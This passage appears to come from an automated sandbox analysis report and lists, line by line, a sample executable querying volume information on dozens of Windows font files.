          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
